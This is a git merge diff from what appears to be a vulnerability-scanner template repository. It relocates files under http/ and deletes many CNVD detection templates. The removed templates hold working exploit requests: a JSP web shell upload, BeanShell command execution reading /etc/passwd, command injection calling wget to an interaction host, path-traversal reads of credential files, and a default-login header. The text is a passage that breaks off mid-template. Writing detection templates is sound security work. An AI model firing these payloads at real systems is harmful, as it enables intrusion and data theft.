Merge branch 'main' into main
commit
a7b52d98a9
|
@ -13,7 +13,7 @@ labels: 'false-negative'
|
|||
|
||||
### Template file:
|
||||
|
||||
<!-- Template producing false-negative results, for example: "cves/XX/XX.yaml" -->
|
||||
<!-- Template producing false-negative results, for example: "http/cves/XX/XX.yaml" -->
|
||||
|
||||
### Command to reproduce:
|
||||
|
||||
|
|
|
@ -13,7 +13,7 @@ labels: 'false-positive'
|
|||
|
||||
### Template file:
|
||||
|
||||
<!-- Template producing false-positive results, for example: "cves/XX/XX.yaml" -->
|
||||
<!-- Template producing false-positive results, for example: "http/cves/XX/XX.yaml" -->
|
||||
|
||||
### Command to reproduce:
|
||||
|
||||
|
|
|
@ -9,7 +9,7 @@ compares the detect version with the payload version.
|
|||
The generated template also includes the tags top-100 and top-200 allowing filtering.
|
||||
|
||||
e.g.
|
||||
nuclei -t technologies/wordpress/plugins -tags top-100 -u https://www.example.com
|
||||
nuclei -t http/technologies/wordpress/plugins -tags top-100 -u https://www.example.com
|
||||
'''
|
||||
|
||||
__author__ = "ricardomaia"
|
||||
|
@ -122,7 +122,7 @@ info:
|
|||
wpscan: https://wpscan.com/plugin/{name}
|
||||
tags: tech,wordpress,wp-plugin,{top_tag}
|
||||
|
||||
requests:
|
||||
http:
|
||||
- method: GET
|
||||
|
||||
path:
|
||||
|
@ -163,7 +163,7 @@ requests:
|
|||
work_dir = os.getcwd()
|
||||
print(f"Current working directory: {work_dir}")
|
||||
helper_dir = f"{work_dir}/helpers/wordpress/plugins"
|
||||
template_dir = f"{work_dir}/technologies/wordpress/plugins"
|
||||
template_dir = f"{work_dir}/http/technologies/wordpress/plugins"
|
||||
|
||||
if not os.path.exists(helper_dir):
|
||||
os.makedirs(helper_dir)
|
||||
|
@ -176,7 +176,7 @@ requests:
|
|||
version_file.write(version)
|
||||
version_file.close()
|
||||
|
||||
template_path = f"technologies/wordpress/plugins/{name}.yaml"
|
||||
template_path = f"http/technologies/wordpress/plugins/{name}.yaml"
|
||||
template_file = open(template_path, "w") # Dev environment
|
||||
template_file.write(template)
|
||||
template_file.close()
|
||||
|
|
|
@ -23,7 +23,7 @@ jobs:
|
|||
run: |
|
||||
go env -w GO111MODULE=off
|
||||
go get gopkg.in/yaml.v3
|
||||
go run .github/scripts/yaml2json.go $GITHUB_WORKSPACE/cves/ cves.json
|
||||
go run .github/scripts/yaml2json.go $GITHUB_WORKSPACE/http/cves/ cves.json
|
||||
md5sum cves.json | cut -d' ' -f1 > cves.json-checksum.txt
|
||||
|
||||
- name: Commit files
|
||||
|
|
|
@ -25,5 +25,5 @@ jobs:
|
|||
- name: Template Validation
|
||||
run: |
|
||||
cp -r ${{ github.workspace }} $HOME
|
||||
nuclei -validate
|
||||
nuclei -validate -w ./workflows
|
||||
nuclei -duc -validate
|
||||
nuclei -duc -validate -w ./workflows
|
|
@ -1,2 +1,18 @@
|
|||
cves/2023/CVE-2023-27524.yaml
|
||||
exposed-panels/papercut-ng-panel.yaml
|
||||
http/cves/2020/CVE-2020-27481.yaml
|
||||
http/cves/2021/CVE-2021-30175.yaml
|
||||
http/cves/2021/CVE-2021-44228.yaml
|
||||
http/cves/2023/CVE-2023-1671.yaml
|
||||
http/cves/2023/CVE-2023-20864.yaml
|
||||
http/cves/2023/CVE-2023-27350.yaml
|
||||
http/cves/2023/CVE-2023-27524.yaml
|
||||
http/cves/2023/CVE-2023-29489.yaml
|
||||
http/cves/2023/CVE-2023-29922.yaml
|
||||
http/default-logins/powerjob-default-login.yaml
|
||||
http/default-logins/umami/umami-default-login.yaml
|
||||
http/exposed-panels/papercut-ng-panel.yaml
|
||||
http/exposed-panels/proxmox-panel.yaml
|
||||
http/exposed-panels/sophos-web-appliance.yaml
|
||||
http/misconfiguration/apache/apache-zeppelin-unauth.yaml
|
||||
http/osint/mail-archive.yaml
|
||||
http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml
|
||||
http/vulnerabilities/wordpress/wpml-xss.yaml
|
||||
|
|
|
@ -1,38 +0,0 @@
|
|||
id: CNVD-2017-03561
|
||||
|
||||
info:
|
||||
name: Fanwei eMobile - OGNL Injection
|
||||
author: ritikchaddha
|
||||
severity: high
|
||||
description: |
|
||||
Fanwei eMobile contains an object graph navigation library vulnerability. An attacker can inject arbitrary JavaScript, thus possibly obtaining sensitive information from a database, modifying data, and executing unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://gitee.com/cute-guy/Penetration_Testing_POC/blob/master/%E6%B3%9B%E5%BE%AEe-mobile%20ognl%E6%B3%A8%E5%85%A5.md
|
||||
- https://reconshell.com/vulnerability-research-list/
|
||||
metadata:
|
||||
verified: true
|
||||
fofa-query: app="泛微-eMobile"
|
||||
tags: cnvd,cnvd2017,emobile,ognl,fanwei
|
||||
|
||||
variables:
|
||||
num1: "{{rand_int(800000, 999999)}}"
|
||||
num2: "{{rand_int(800000, 999999)}}"
|
||||
result: "{{to_number(num1)*to_number(num2)}}"
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/login.do?message={{num1}}*{{num2}}"
|
||||
- "{{BaseURL}}/login/login.do?message={{num1}}*{{num2}}"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "{{result}}"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,32 +0,0 @@
|
|||
id: CNVD-2018-13393
|
||||
|
||||
info:
|
||||
name: Metinfo - Local File Inclusion
|
||||
author: ritikchaddha
|
||||
severity: high
|
||||
description: Metinfo is susceptible to local file inclusion.
|
||||
reference:
|
||||
- https://paper.seebug.org/676/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cwe-id: CWE-22
|
||||
tags: metinfo,cnvd,cvnd2018,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/include/thumb.php?dir=http\..\admin\login\login_check.php'
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<?php"
|
||||
- "login_met_cookie($metinfo_admin_name);"
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/07/05
|
|
@ -1,37 +0,0 @@
|
|||
id: CNVD-2019-01348
|
||||
|
||||
info:
|
||||
name: Xiuno BBS CNVD-2019-01348
|
||||
author: princechaddha
|
||||
severity: high
|
||||
description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
|
||||
reference:
|
||||
- https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-score: 7.5
|
||||
cwe-id: CWE-284
|
||||
remediation: Upgrade to the latest version of Xiuno BBS or switch to a supported product.
|
||||
tags: xiuno,cnvd,cnvd2019
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/install/"
|
||||
headers:
|
||||
Accept-Encoding: deflate
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "/view/js/xiuno.js"
|
||||
- "Choose Language (选择语言)"
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/01/26
|
|
@ -1,37 +0,0 @@
|
|||
id: CNVD-2019-06255
|
||||
|
||||
info:
|
||||
name: CatfishCMS RCE
|
||||
author: Lark-Lab
|
||||
severity: critical
|
||||
description: CatfishCMS 4.8.54 contains a remote command execution vulnerability in the "method" parameter.
|
||||
reference:
|
||||
- https://its401.com/article/yun2diao/91344725
|
||||
- https://github.com/xwlrbh/Catfish/issues/4
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cwe-id: CWE-77
|
||||
remediation: Upgrade to CatfishCMS version 4.8.54 or later.
|
||||
tags: rce,cnvd,catfishcms,cnvd2019
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'OS'
|
||||
- 'PATH'
|
||||
- 'SHELL'
|
||||
- 'USER'
|
||||
condition: and
|
||||
|
||||
# Enhanced by cs on 2022/02/28
|
|
@ -1,54 +0,0 @@
|
|||
id: CNVD-2019-19299
|
||||
|
||||
info:
|
||||
name: Zhiyuan A8 - Remote Code Execution
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
description: Zhiyuan A8 is susceptible to remote code execution because of an arbitrary file write issue.
|
||||
reference:
|
||||
- https://www.cxyzjd.com/article/guangying177/110177339
|
||||
- https://github.com/sectestt/CNVD-2019-19299
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cwe-id: CWE-77
|
||||
tags: zhiyuan,cnvd,cnvd2019,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /seeyon/htmlofficeservlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q =0.8,application/signed-exchange;v=b3
|
||||
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
|
||||
Connection: close
|
||||
|
||||
DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV
|
||||
OPTION=S3WYOSWLBSGr
|
||||
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
|
||||
= WUghPB3szB3Xwg66 the CREATEDATE
|
||||
recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6
|
||||
originalFileId = wV66
|
||||
originalCreateDate = wUghPB3szB3Xwg66
|
||||
FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs
|
||||
needReadFile = yRWZdAS6
|
||||
originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4
|
||||
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("<pre>" +excuteCmd(request.getParameter("{{randstr}}")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
|
||||
|
||||
- |
|
||||
GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_2 == 200'
|
||||
- 'contains(body_1, "htmoffice operate")'
|
||||
- 'contains(body_2, "Windows IP")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/05/12
|
|
@ -1,30 +0,0 @@
|
|||
id: CNVD-2019-32204
|
||||
|
||||
info:
|
||||
name: Fanwei e-cology <=9.0 - Remote Code Execution
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
description: Fanwei e-cology <=9.0 is susceptible to remote code execution vulnerabilities. Remote attackers can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system.
|
||||
reference:
|
||||
- https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cwe-id: CWE-77
|
||||
tags: fanwei,cnvd,cnvd2019,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /bsh.servlet.BshServlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
# Enhanced by mp on 2022/05/12
|
|
@ -1,34 +0,0 @@
|
|||
id: CNVD-2020-23735
|
||||
|
||||
info:
|
||||
name: Xxunchi CMS - Local File Inclusion
|
||||
author: princechaddha
|
||||
severity: high
|
||||
description: Xunyou CMS is vulnerable to local file inclusion. Attackers can use vulnerabilities to obtain sensitive information.
|
||||
reference:
|
||||
- https://www.cnvd.org.cn/flaw/show/2025171
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cwe-id: CWE-22
|
||||
tags: xunchi,lfi,cnvd,cnvd2020
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"
|
||||
- "display_errors"
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/07/22
|
|
@ -1,68 +0,0 @@
|
|||
id: CNVD-2020-26585
|
||||
|
||||
info:
|
||||
name: Showdoc <2.8.6 - File Uploads
|
||||
author: pikpikcu,Co5mos
|
||||
severity: critical
|
||||
description: |
|
||||
ShowDoc is an online API and technical documentation tool that is very suitable for IT teams. Showdoc has a file upload vulnerability, which attackers can exploit to gain server permissions.
|
||||
reference:
|
||||
- https://vul.wangan.com/a/CNVD-2020-26585
|
||||
- https://blog.csdn.net/qq_48985780/article/details/122211136
|
||||
- https://github.com/star7th/showdoc/pull/1059
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
|
||||
cvss-score: 9.9
|
||||
cwe-id: CWE-434
|
||||
metadata:
|
||||
verified: true
|
||||
fofa-query: app="ShowDoc"
|
||||
tags: cnvd,cnvd2020,showdoc,fileupload
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /index.php?s=/home/page/uploadImg HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633
|
||||
|
||||
----------------------------835846770881083140190633
|
||||
Content-Disposition: form-data; name="editormd-image-file"; filename="{{randstr}}.<>txt"
|
||||
Content-Type: text/plain
|
||||
|
||||
test{{randstr}}
|
||||
----------------------------835846770881083140190633--
|
||||
|
||||
- |
|
||||
GET /Public//Uploads//{{date}}//{{file}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "test{{randstr}}"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: date
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '(\d{4}-\d{2}-\d{2})\\/([a-f0-9]+\.txt)'
|
||||
internal: true
|
||||
|
||||
- type: regex
|
||||
name: file
|
||||
part: body
|
||||
group: 2
|
||||
regex:
|
||||
- '(\d{4}-\d{2}-\d{2})\\/([a-f0-9]+\.txt)'
|
||||
internal: true
|
||||
|
||||
# Enhanced by mp on 2022/05/30
|
|
@ -1,32 +0,0 @@
|
|||
id: CNVD-2020-46552
|
||||
|
||||
info:
|
||||
name: Sangfor EDR - Remote Code Execution
|
||||
author: ritikchaddha
|
||||
severity: critical
|
||||
description: Sangfor Endpoint Monitoring and Response Platform (EDR) contains a remote code execution vulnerability. An attacker could exploit this vulnerability by constructing an HTTP request which could execute arbitrary commands on the target host.
|
||||
reference:
|
||||
- https://www.modb.pro/db/144475
|
||||
- https://blog.csdn.net/bigblue00/article/details/108434009
|
||||
- https://cn-sec.com/archives/721509.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cwe-id: CWE-77
|
||||
tags: cnvd,cnvd2020,sangfor,rce
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body, "$show_input = function($info)")'
|
||||
- 'contains(body, "$strip_slashes($host)")'
|
||||
- 'contains(body, "Log Helper")'
|
||||
- 'status_code == 200'
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/05/18
|
|
@ -1,34 +0,0 @@
|
|||
id: CNVD-2020-56167
|
||||
|
||||
info:
|
||||
name: Ruijie Smartweb - Default Password
|
||||
author: pikpikcu
|
||||
severity: low
|
||||
description: Ruijie Smartweb contains a vulnerability via the default password. An attacker can successfully bypass entering required credentials, thus possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167
|
||||
- https://securityforeveryone.com/tools/ruijie-smartweb-default-password-scanner
|
||||
tags: ruijie,default-login,cnvd,cnvd2020
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/WEB_VMS/LEVEL15/"
|
||||
headers:
|
||||
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
|
||||
body: command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Level was: LEVEL15"
|
||||
- "/WEB_VMS/LEVEL15/"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/09/30
|
|
@ -1,35 +0,0 @@
|
|||
id: CNVD-2020-62422
|
||||
|
||||
info:
|
||||
name: Seeyon - Local File Inclusion
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: Seeyon is vulnerable to local file inclusion.
|
||||
reference:
|
||||
- https://blog.csdn.net/m0_46257936/article/details/113150699
|
||||
tags: lfi,cnvd,cnvd2020,seeyon
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/x-msdownload"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "ctpDataSource.password"
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/07/22
|
|
@ -1,51 +0,0 @@
|
|||
id: CNVD-2020-67113
|
||||
|
||||
info:
|
||||
name: H5S CONSOLE - Unauthorized Access
|
||||
author: ritikchaddha
|
||||
severity: medium
|
||||
description: H5S CONSOLE is susceptible to an unauthorized access vulnerability.
|
||||
reference:
|
||||
- https://vul.wangan.com/a/CNVD-2020-67113
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cwe-id: CWE-425
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"H5S CONSOLE"
|
||||
tags: cnvd,cnvd2020,h5s,unauth,h5sconsole
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/api/v1/GetSrc"
|
||||
- "{{BaseURL}}/api/v1/GetDevice"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'strUser'
|
||||
- 'strPasswd'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'H5_AUTO'
|
||||
- 'H5_DEV'
|
||||
condition: or
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/json"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,50 +0,0 @@
|
|||
id: CNVD-2020-68596
|
||||
|
||||
info:
|
||||
name: WeiPHP 5.0 - Path Traversal
|
||||
author: pikpikcu
|
||||
description: WeiPHP 5.0 is susceptible to directory traversal attacks.
|
||||
severity: high
|
||||
reference:
|
||||
- http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cwe-id: CWE-22
|
||||
tags: weiphp,lfi,cnvd,cnvd2020
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
"1":1
|
||||
- |
|
||||
GET /public/index.php/home/file/user_pics HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
|
||||
- |
|
||||
GET {{endpoint}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: endpoint
|
||||
part: body
|
||||
internal: true
|
||||
regex:
|
||||
- '/public/uploads/picture/(.*.jpg)'
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- https://weiphp.cn
|
||||
- WeiPHP
|
||||
- DB_PREFIX
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/05/12
|
|
@ -1,37 +0,0 @@
|
|||
id: CNVD-2021-01931
|
||||
|
||||
info:
|
||||
name: Ruoyi Management System - Local File Inclusion
|
||||
author: daffainfo,ritikchaddha
|
||||
severity: high
|
||||
description: The Ruoyi Management System contains a local file inclusion vulnerability that allows attackers to retrieve arbitrary files from the operating system.
|
||||
reference:
|
||||
- https://disk.scan.cm/All_wiki/%E4%BD%A9%E5%A5%87PeiQi-WIKI-POC-2021-7-20%E6%BC%8F%E6%B4%9E%E5%BA%93/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%20CNVD-2021-01931.md?hash=zE0KEPGJ
|
||||
tags: ruoyi,lfi,cnvd,cnvd2021
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cwe-id: CWE-22
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/common/download/resource?resource=/profile/../../../../etc/passwd"
|
||||
- "{{BaseURL}}/common/download/resource?resource=/profile/../../../../Windows/win.ini"
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "bit app support"
|
||||
- "fonts"
|
||||
- "extensions"
|
||||
condition: and
|
||||
|
||||
# Enhanced by cs on 06/03/2022
|
|
@ -1,34 +0,0 @@
|
|||
id: CNVD-2021-09650
|
||||
|
||||
info:
|
||||
name: Ruijie Networks-EWEB Network Management System - Remote Code Execution
|
||||
author: daffainfo,pikpikcu
|
||||
severity: critical
|
||||
description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks.
|
||||
reference:
|
||||
- http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
|
||||
- https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py
|
||||
- https://www.ruijienetworks.com
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cwe-id: CWE-77
|
||||
tags: ruijie,cnvd,cnvd2021,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /guest_auth/guestIsUp.php
|
||||
Host: {{Hostname}}
|
||||
|
||||
mac=1&ip=127.0.0.1|wget {{interactsh-url}}
|
||||
|
||||
unsafe: true
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
name: http
|
||||
words:
|
||||
- "http"
|
||||
|
||||
# Enhanced by mp on 2022/05/12
|
|
@ -1,33 +0,0 @@
|
|||
id: CNVD-2021-10543
|
||||
|
||||
info:
|
||||
name: EEA - Information Disclosure
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: EEA is susceptible to information disclosure including the username and password.
|
||||
reference:
|
||||
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cwe-id: CWE-200
|
||||
tags: config,exposure,cnvd,cnvd2021
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/authenticationserverservlet"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "<username>(.*?)</username>"
|
||||
- "<password>(.*?)</password>"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/05
|
|
@ -1,45 +0,0 @@
|
|||
id: CNVD-2021-14536
|
||||
|
||||
info:
|
||||
name: Ruijie RG-UAC Unified Internet Behavior Management Audit System - Information Disclosure
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Ruijie RG-UAC Unified Internet Behavior Management Audit System is susceptible to information disclosure. Attackers could obtain user accounts and passwords by reviewing the source code of web pages, resulting in the leakage of administrator user authentication information.
|
||||
reference:
|
||||
- https://www.adminxe.com/2163.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
|
||||
cvss-score: 8.3
|
||||
cwe-id: CWE-522
|
||||
metadata:
|
||||
fofa-query: title="RG-UAC登录页面"
|
||||
tags: ruijie,cnvd,cnvd2021,disclosure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/get_dkey.php?user=admin"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"pre_define"'
|
||||
- '"auth_method"'
|
||||
- '"name"'
|
||||
- '"password"'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '"role":"super_admin",(["a-z:,0-9]+),"lastpwdtime":'
|
||||
|
||||
# Enhanced by mp on 2022/03/28
|
|
@ -1,32 +0,0 @@
|
|||
id: CNVD-2021-15822
|
||||
|
||||
info:
|
||||
name: ShopXO Download File Read
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference:
|
||||
- https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"ShopXO企业级B2C电商系统提供商"
|
||||
fofa-query: app="ShopXO企业级B2C电商系统提供商"
|
||||
tags: shopxo,lfi,cnvd,cnvd2021
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
